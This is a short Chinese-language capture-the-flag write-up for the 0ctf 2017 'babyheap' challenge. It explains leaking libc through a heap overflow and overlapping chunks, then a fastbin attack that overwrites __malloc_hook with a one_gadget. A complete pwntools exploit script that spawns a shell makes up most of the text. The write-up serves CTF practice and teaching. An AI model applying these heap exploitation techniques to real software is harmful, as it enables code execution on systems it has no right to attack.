简单说一下这个题目的思路:
1.泄露libc:
编辑chunk的时候存在堆溢出,可以通过堆溢出,修改两个不同的指针,指向同一个chunk,随后free掉其中一个,即可dump其中内存,main_arena的地址。
2.同样再次利用堆溢出,修改其中一个chunk的fd指针为__malloc_hook,然后修改malloc_hook为one_gadget。
这里解答一个疑惑,为什么不写got表?
1,首先 RELRO保护全开,是不可写的。
2,其次,bss段上很难找到数据通过size检查。
完整exp:
from pwn import *
# p = remote("node4.buuoj.cn",26739)
p = process("./0ctf_2017_babyheap")
e = ELF("./0ctf_2017_babyheap")
libc = ELF("libc-2.23.so")
context.log_level = "debug"
def add(size):
p.recvuntil("Command: ")
p.sendline("1")
p.recvuntil("Size: ")
p.sendline(str(size))
def fill(index,size,content):
p.recvuntil("Command: ")
p.sendline("2")
p.recvuntil("Index: ")
p.sendline(str(index))
p.recvuntil("Size: ")
p.sendline(str(size))
p.recvuntil("Content: ")
p.send(str(content))
def dump(index):
p.recvuntil("Command: ")
p.sendline("4")
p.recvuntil("Index: ")
p.sendline(str(index))
def free(index):
p.recvuntil("Command: ")
p.sendline("3")
p.recvuntil("Index: ")
p.sendline(str(index))
def dbg():
gdb.attach(p)
pause()
add(0x10)#0
add(0x10)#1
add(0x10)#2
add(0x10)#3
add(0x80)#4
add(0x10)#5
free(2)
free(1)
pl1 = '\x00'*(0x10) + p64(0) + p64(0x21) + '\x80'
fill(0,len(pl1),pl1)
pl2 = "a"*(0x10+8) + p64(0x21)
fill(3,len(pl2),pl2)
add(0x10)
add(0x10)
pl3 = 'a'*(0x10+8) + p64(0x91)
fill(3,len(pl3),pl3)
free(4)
dump(2)
arena_addr = u64(p.recvuntil("\x7f")[-6:].ljust(8,'\x00'))
libc_base = arena_addr - (0x3c4b20+88)
log.success("arena_addr: "+hex(arena_addr))
log.success("libc_base:"+hex(libc_base))
malloc_hook = libc_base + libc.sym["__malloc_hook"]
log.success("hook_addr:"+hex(malloc_hook))
add(0x60)
free(4)
fd = malloc_hook - 0x23
fake_chunk = p64(fd)
fill(2,len(fake_chunk),fake_chunk)
add(0x60)
add(0x60)
onegadget = libc_base + 0x4526a
pl4 = 'a'*(0x13) + p64(onegadget)
fill(6,len(pl4),pl4)
add(0x100)
p.interactive()